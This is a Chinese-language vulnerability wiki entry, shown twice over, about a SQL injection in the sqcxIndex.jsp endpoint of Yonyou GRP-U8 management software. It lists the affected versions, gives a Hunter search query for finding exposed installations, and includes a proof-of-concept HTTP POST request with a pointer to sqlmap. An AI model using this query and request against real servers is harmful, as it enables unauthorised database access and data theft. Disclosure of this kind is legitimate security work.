fofamini-wiki

登录白背景

源码

用友GRP-U8 sqcxindex sql注入

一、漏洞简介

用友GRP-U8是用友软件推出的一款企业级管理软件套件，旨在帮助企业实现全面的数字化管理和业务优化。用友GRP-U8 sqcxindex接口对用户传入的参数未进行有效的过滤，直接拼接到SQL查询语句中，导致SQL注入漏洞。攻击者通过该漏洞可以获取数据库敏感信息。

二、影响版本

用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）
用友GRP-U8 高校内控管理软件（Manager版）

三、资产测绘

hunterapp.name="用友GRP-U8 OA"
特征

四、漏洞复现

POST /u8qx/sqcxIndex.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

key=2

sqlmap

原文: https://www.yuque.com/xiaokp7/ocvun2/ttagmlmm0ecyg5gg

# 用友GRP-U8 sqcxindex sql注入

# 一、漏洞简介
用友GRP-U8是用友软件推出的一款企业级管理软件套件，旨在帮助企业实现全面的数字化管理和业务优化。用友GRP-U8 sqcxindex接口对用户传入的参数未进行有效的过滤，直接拼接到SQL查询语句中，导致SQL注入漏洞。攻击者通过该漏洞可以获取数据库敏感信息。

# 二、影响版本

- 用友GRP-U8 行政事业内控管理软件（新政府会计制度专版）
- 用友GRP-U8 高校内控管理软件（Manager版）

# 三、资产测绘

- hunter`app.name="用友GRP-U8 OA"`
- 特征

![image.png](./img/zhsWLWhD4s6TMYfh/1696132271756-860b06b9-a041-40a7-801c-1d19f68283a6-147514.png)
![image.png](./img/zhsWLWhD4s6TMYfh/1696132517728-7a746455-5255-4276-97e0-2f7c40f6cb39-939072.png)
![image.png](./img/zhsWLWhD4s6TMYfh/1696132546612-e8cecff0-554c-44de-a6f7-497c1618908d-000133.png)

# 四、漏洞复现
```
POST /u8qx/sqcxIndex.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded

key=2
```
sqlmap
![image.png](./img/zhsWLWhD4s6TMYfh/1700136331368-0f56b036-b1e1-4f0e-8c47-99f970b7e3b8-532149.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ttagmlmm0ecyg5gg>